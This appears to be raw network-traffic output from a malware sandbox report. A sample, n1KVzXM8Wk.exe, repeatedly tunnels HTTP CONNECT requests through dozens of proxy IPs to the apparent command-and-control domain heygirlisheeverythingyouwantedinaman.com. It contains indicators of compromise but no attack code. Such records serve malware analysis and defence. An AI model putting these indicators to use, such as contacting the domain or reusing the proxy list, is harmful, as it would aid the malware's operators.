                                                                                                      Feb 23, 2024 09:45:49.568698883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.584280968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.756181002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:14.782166958 CET536INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:46:14 GMT
                                                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                                                      Content-Length: 639
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                                      Feb 23, 2024 09:46:14.782191038 CET295INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                                      Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2110192.168.2.455206192.111.134.1041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.493017912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2111192.168.2.451102103.145.150.2680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.493530035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2112192.168.2.451251103.244.163.9931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.493530989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.581258059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.646868944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.646822929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.646784067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2113192.168.2.45140145.81.232.17543936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.500715971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.581362963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2114192.168.2.451510159.203.137.249497856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.535294056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569068909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2115192.168.2.455209203.170.146.14641536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.535382986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2116192.168.2.455203161.97.173.7878186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.560353041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569063902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.568830967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.568707943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.584367037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2117192.168.2.455259162.241.66.135643676812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.578372955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.581357956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2118192.168.2.45153192.205.108.94475716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.578372955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569108963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2119192.168.2.451707148.72.23.135430086812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.600653887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.709685087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2120192.168.2.455267164.132.112.254312596812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.621079922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2121192.168.2.454612188.164.193.178306636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.621083975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.146912098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.740813971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.834649086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.146931887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.381172895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.849961042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2122192.168.2.451554109.205.181.27157376812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.621177912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.680879116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2123192.168.2.451468185.103.178.24241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.621212006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2124192.168.2.451732207.180.198.241172286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.621237040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2125192.168.2.45175388.245.138.8710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.773761988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2126192.168.2.455201115.171.217.4878916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.773875952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2127192.168.2.454649167.172.159.43329886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.806420088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.147023916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.504977942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.240784883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.444329977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.646395922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.937012911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2128192.168.2.455222128.199.221.91296036812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.901840925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.681277990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.683639050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2129192.168.2.455559178.54.21.20380816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.926323891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2130192.168.2.451774152.32.132.220806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.933846951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.975106001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2131192.168.2.455300107.180.103.214458706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.936892986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.975194931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2132192.168.2.45174351.68.164.7753676812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.937287092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.975090981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.974925041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.990593910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.990669012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:14.146977901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2133192.168.2.455337199.187.210.5441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.937349081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2134192.168.2.455392104.37.135.14541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:37.944796085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2135192.168.2.4555491.27.226.21080606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:38.547462940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2136192.168.2.455546183.88.212.16741536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:38.547657967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2137192.168.2.45533494.241.173.3780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:38.549330950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.115607023 CET142INHTTP/1.1 502 Bad Gateway
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 68
                                                                                                      Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 3a 20 54 72 79 20 61 67 61 69 6e
                                                                                                      Data Ascii: dial tcp: lookup heygirlisheeverythingyouwantedinaman.com: Try again


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2138192.168.2.451910103.159.66.6180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:38.912054062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2139192.168.2.452028192.99.37.195496136812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:38.956880093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2140192.168.2.454684173.212.240.168588546812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:38.959995985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.068924904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.084393978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.101366997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.100588083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2141192.168.2.45199641.111.243.134806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:38.960228920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.068856001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.084343910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.831017017 CET98INHTTP/1.0 200 Connection Established
                                                                                                      Proxy-agent: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k


